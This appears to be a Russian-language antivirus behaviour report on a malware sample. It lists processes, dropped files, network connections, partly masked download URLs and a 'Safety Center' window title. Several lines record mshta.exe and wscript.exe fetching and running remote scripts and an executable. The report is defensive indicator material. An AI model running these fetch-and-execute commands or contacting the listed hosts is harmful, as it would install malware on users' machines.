Техническая информация
- '<SYSTEM32>\wscript.exe' "%TEMP%\akjsdkjsakldklasj.js"
- '<Текущая директория>\temp.exe' (загружен из сети Интернет)
- '<SYSTEM32>\mshta.exe' http://ur###nam.net/8732489273.php
- '<SYSTEM32>\mshta.exe' http://21#.#5.78.66/install.php?id##########
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\2VAZY7AN\u4[1].exe
- <Текущая директория>\temp.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\8732489273[1].php
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\install[1].php
- %TEMP%\akjsdkjsakldklasj.js
- 'ur###nam.net':80
- 'localhost':1045
- '22#.#96.59.24':80
- 'localhost':1039
- '21#.#5.78.66':80
- 'localhost':1042
- http://22#.#96.59.24/u4.exe
- http://ur###nam.net/8732489273.php
- http://21#.#5.78.66/install.php?id##########
- DNS ASK ur###nam.net
- ClassName: 'TForm1' WindowName: 'Safety Center'
- ClassName: 'Shell_TrayWnd' WindowName: ''